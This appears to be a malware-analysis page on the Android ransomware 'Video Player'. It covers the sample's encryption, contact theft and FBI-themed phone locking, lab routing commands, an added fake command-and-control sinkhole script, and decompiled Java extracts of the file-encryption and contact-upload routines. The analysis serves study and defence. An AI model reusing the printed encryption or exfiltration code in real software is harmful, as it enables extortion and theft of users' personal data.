Steal, ransom, data encryption and phone locking

GroDDViewer graphs:


Video Player is a ransomware discovered in 2015. It encrypts the user's stored multimedia files, and it can send an SMS to the user's contacts asking them to download the malware. The malware can also steal the user's contacts and SMS messages. The application impersonates a government agency (the FBI) to demand a ransom.

The application is a fake video player. The interface is simple, and the application cannot actually play a video.

Once the phone is locked, the application shows a message saying that the user is "guilty of possessing pornographic files, which is forbidden by US law, and must pay".

The application needs a server to execute the malicious code. However, the server is down today, so a fake server has been created to receive the stolen contacts.

Stage 1: Configuration of the fake server

You must configure the phone: activate tethering (Settings > More > Tethering & portable hotspot > USB tethering).

To configure the server, run the following ("$" is a normal user prompt, "#" a root prompt):

  $ ifconfig                                   # on the host: the usb0 interface has the address IP1
  # echo 1 > /proc/sys/net/ipv4/ip_forward     # on the host, as root: enable IP forwarding
  $ adb shell                                  # open a shell on the phone
  # route add default gw IP1 dev rndis0        # on the phone: send all traffic through the host (IP1)
  # ip addr add IPserveur dev eth0             # assign the address of the malware's server (IPserveur) to the interface
  $ python 12449                               # start the fake server on port 12449 (the script name is not given on the page)

Stage 2: Communication between the client and the server

The client sends several requests to the server:

  • POST: sends information about the phone.
  • GET: asks for an order. The client receives the identifier of an order.
  • GET: only confirms the order. The client confirms that the request has been carried out, and the server answers with status code 200.
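A minimal fake command server for Stage 2, as an added example (this is not the page's own `python 12449` script): it records everything the sample uploads, hands out order identifiers, and answers confirmations with a 200. The URL paths /order and /confirm, the JSON bodies, and the order ids 1 and 2 are assumptions; the page only names the three request types and shows that orders carry an integer id (CommandData.mId).

```python
"""Fake command server for analysing the Video Player sample in an isolated lab.

Usage:  python fake_server.py 12449   (listens on all interfaces, so the tethered phone can reach it)
"""
import json
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Order ids handed out, one per GET /order. Constructed placeholder values: the page shows that
# orders carry an integer id but not which ids the real server used.
DEFAULT_ORDERS = [1, 2]
NO_ORDER = 0  # constructed sentinel meaning "nothing to do"


def new_state(orders=DEFAULT_ORDERS):
    """Fresh server-side record of one analysis session."""
    return {"received": [], "pending": list(orders), "issued": [], "confirmed": []}


def handle_request(method, path, body, state):
    """Route one client request and return (status_code, reply_dict).

    Everything the sample uploads is recorded in state["received"] and never acted upon.
    The three request types follow Stage 2 of the page; the URL paths are assumptions.
    """
    url = urlparse(path)
    if method == "POST":
        # Request 1 (phone information) and the contacts upload done by getAndSendContactData():
        # keep the raw body, parsed as JSON when it is JSON.
        try:
            data = json.loads(body.decode("utf-8")) if body else {}
        except ValueError:
            data = {"raw": body.decode("utf-8", "replace")}
        state["received"].append({"path": url.path, "data": data})
        return 200, {"status": "ok"}
    if method == "GET" and url.path == "/order":
        # Request 2: the client asks for an order and gets back an order identifier.
        order_id = state["pending"].pop(0) if state["pending"] else NO_ORDER
        state["issued"].append(order_id)
        return 200, {"id": order_id}
    if method == "GET" and url.path == "/confirm":
        # Request 3: the client confirms the order was carried out; it only needs the 200.
        ids = parse_qs(url.query).get("id", [])
        state["confirmed"].extend(int(i) for i in ids if i.isdigit())
        return 200, {"status": "ok"}
    return 404, {"error": "unknown endpoint"}


class FakeC2Handler(BaseHTTPRequestHandler):
    """Thin HTTP wrapper around handle_request(); the state is shared by all requests."""
    state = new_state()

    def _dispatch(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else b""
        status, reply = handle_request(self.command, self.path, body, self.state)
        payload = json.dumps(reply).encode("utf-8")
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)
        print("[*] %s %s -> %d (received so far: %d uploads)"
              % (self.command, self.path, status, len(self.state["received"])))

    do_GET = _dispatch
    do_POST = _dispatch

    def log_message(self, fmt, *args):  # silence the default access log; _dispatch prints its own line
        pass


def main():
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 12449
    HTTPServer(("0.0.0.0", port), FakeC2Handler).serve_forever()


if __name__ == "__main__":
    main()
```

Every upload ends up in the handler's state rather than being parsed for action, which is the behaviour wanted from an analysis sinkhole: the sample sees the protocol it expects (ok, an order id, a 200 on confirmation) while the analyst gets the raw record of what it exfiltrates.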

To trigger the malware, launch the server and then start the application.


Malware type:

  • Ransomware

Attacks:

  • Confidentiality
  • Integrity
  • Availability
  • Normal use

Infection technique: Standalone application

Malicious code type:

  • Use Java code
  • Use native code

Hiding techniques:

  • Not hidden

Triggering techniques:

  • Executed at launch
  • Waits for a particular intent


Java source code extracts: the function that encrypts a file, the function that sends the user's contacts, and an example of an order (command).

  private static final byte[] salt = "ThisIsSalt".getBytes();  // hard-coded salt

  // Encrypts the file at paramString into paramString + "_Enc"; paramInt is the read buffer size.
  private static void EncryptFile(String paramString, Key paramKey, int paramInt)
    throws IOException, NoSuchAlgorithmException, NoSuchPaddingException, InvalidKeyException {
    FileInputStream localFileInputStream = new FileInputStream(paramString);
    File localFile = new File(paramString + "_Enc");
    if (!localFile.exists()) {
      Object localObject = new FileOutputStream(localFile);
      Cipher localCipher = Cipher.getInstance("AES");
      localCipher.init(1, paramKey);                          // 1 == Cipher.ENCRYPT_MODE
      // the decompiler reused the paramKey slot here; a typed local is used so the extract compiles
      CipherOutputStream localOut = new CipherOutputStream((OutputStream)localObject, localCipher);
      localObject = new byte[paramInt];
      for (;;) {
        int i = localFileInputStream.read((byte[])localObject, 0, paramInt);
        if (i == -1) {
          break;
        }
        localOut.write((byte[])localObject, 0, i);
      }
      localOut.close();
      localFileInputStream.close();
    }
    File localOriginal = new File(paramString);   // the original file is handled next (extract ends here)
  }

  // Reads the contact list and uploads it to the command server (Volley-style RequestFuture).
  private void getAndSendContactData() {
    Object localObject = DataHelper.getContactList(this);
    ArrayList localArrayList = new ArrayList(((List)localObject).size());
    localObject = ((List)localObject).iterator();
    while (((Iterator)localObject).hasNext()) {
      localArrayList.add(new ContactEntry((Contact)((Iterator)localObject).next()));
    }
    localObject = RequestFuture.newFuture();
    this.mRQ.add(new ContactsRequest(localArrayList, (Response.Listener)localObject, (Response.ErrorListener)localObject));
    try {
      ((RequestFuture)localObject).get(30L, TimeUnit.SECONDS);   // wait up to 30 s for the upload
      Log.d("CheckerSrv", "Contacts sending request succeeded");
    } catch (Exception localException) {
      Log.e("CheckerSrv", "Contacts sending request failed. " + localException.getLocalizedMessage());
    }
  }

// An order received from the server: an integer id mapped to the action to perform.
public class CommandData {
  int mId;

  public ActionType getActionType() {
    return ActionType.forCommandId(this.mId);
  }

  public int getId() {
    return this.mId;
  }
}